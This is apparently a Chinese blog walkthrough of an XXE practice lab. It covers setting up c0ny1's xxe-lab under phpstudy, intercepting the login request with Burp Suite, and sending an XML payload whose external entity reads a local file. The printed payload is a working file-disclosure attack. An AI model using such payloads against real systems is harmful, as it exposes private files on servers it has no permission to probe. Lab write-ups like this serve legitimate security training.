1、靶场搭建
phpstudy
window10
靶场源文件 https://github.com/c0ny1/xxe-lab
下载完毕后解压放置在phpstudy/www/目录下即可,访问 http://127.0.0.1/xxe-lab/php_xxe/(我这里解压后改了下文件夹名为xxe-lab,所以访问地址变了)
2、漏洞复现
第一步 我们打开靶场输入 admin/123456 进行尝试登录,发现上方地址栏内未发生变化,判断登录页面为POST传参;
第二步 打开burpsuit,抓取数据包进行分析,判断此处可以提交xml格式的数据
第三步 下方输入payload,请求访问目录下的1.txt文件
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///D://phpstudy//PHPTutorial//WWW//1.txt">
]>
<user><username>&f;</username><password>admin888</password></user>
第四步 查看1.txt文件内容,与响应包内内容一致,漏洞复现成功。
如果对XXE漏洞原理需要详细了解,请查看之前的博客
XXE漏洞详解